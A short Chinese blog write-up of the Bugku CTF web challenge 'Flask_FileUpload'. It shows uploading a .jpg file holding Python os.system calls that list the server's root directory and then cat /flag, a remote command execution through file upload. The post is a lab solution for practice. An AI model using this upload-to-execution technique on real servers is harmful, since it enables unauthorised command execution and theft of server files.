技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
独隅
13 小时前
Python `with` 语句 (上下文管理器) 深度解析与避坑指南
开发语言·python
浮笙若有梦
13 小时前
我开源了一个比 Ant Design Table 更好用的高性能虚拟表格
前端·vue.js
做怪小疯子
13 小时前
Python 基础学习
开发语言·python·学习
一只程序熊
13 小时前
vite-cool-unix-ctx] Unexpected token l in JSON at position 0
java·服务器·前端
Eward-an
13 小时前
高效构建长度为 n 的开心字符串中第 k 小的字符串
python·leetcode
张元清
13 小时前
React Hooks vs Vue Composables:2026 年全面对比
前端·javascript·面试
yuki_uix
13 小时前
从三个自定义 Hook 看 React 状态管理的设计思想
前端·javascript
大漠_w3cpluscom
13 小时前
如何在 clamp() 中使用 auto 值
前端·css·html
Younglina
13 小时前
🏸 从零打造一个羽毛球球线追踪网站:纯前端实战指南
前端
Bert.Cai
13 小时前
Python time.sleep函数作用
开发语言·python
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03OpenClaw 使用和管理 MCP 完全指南04OpenClaw macOS 完整安装与本地模型配置教程(实战版)05本地部署 OpenClaw + DeepSeek-R1 完全指南06UV安装并设置国内源07OpenClaw 飞书机器人不回复消息?3 小时踩坑总结08Openclow安装保姆级教程09OpenClaw Control UI安全上下文访问配置10得物前端部门,没了